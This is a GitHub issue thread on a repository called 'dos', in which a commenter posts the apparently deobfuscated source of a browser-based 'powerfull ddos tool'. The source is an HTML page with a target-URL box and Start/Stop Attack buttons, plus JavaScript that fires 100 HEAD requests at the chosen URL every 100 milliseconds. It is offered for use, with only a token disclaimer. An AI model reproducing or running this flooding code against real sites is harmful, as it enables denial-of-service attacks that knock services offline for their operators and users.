Darksel0 / dos

https://darksel0.github.io/dos/
2 stars 0 forks source link

Why do you obfuscate #1

Open Mrgaton opened 3 months ago

Mrgaton commented 3 months ago

people will deobfuscate anyways

<html>
  <head>
    <title>powerfull ddos</title>
  </head>
  <body>
    <font size=2>
      <table width="100%">
        <tr>
          <td bgcolor=#3300cc align="center" colspan=2>
            <font color=#ffffff>
              <b>powerfull ddos tool</b>
            </font>
          </td>
        </tr>
      </table>
      <br>
      <br>Please do not use for vandalism <br>
      <br>
      <hr>
    </font>
  </body>
</html>
<input type="text" id="urlInput" placeholder="Enter target URL">\n <button onclick="startAttack()">Start Attack</button>\n <button onclick="stopAttack()">Stop Attack</button>
const numRequests = 100;
const requestInterval = 100;
const requests = [];

const startAttack = () => {
  targetURL = document.getElementById('urlInput').value;
  setInterval(sendRequests, requestInterval);
};

const stopAttack = () => {
  clearInterval();
};

const sendRequests = () => {
  for (let i = 0; i < numRequests; i++) {
    requests.push(new XMLHttpRequest());
    requests[i].open('HEAD', targetURL);
    requests[i].send();
  }
};
Mrgaton commented 3 months ago

if you publish something on github should be open source if not you could get banned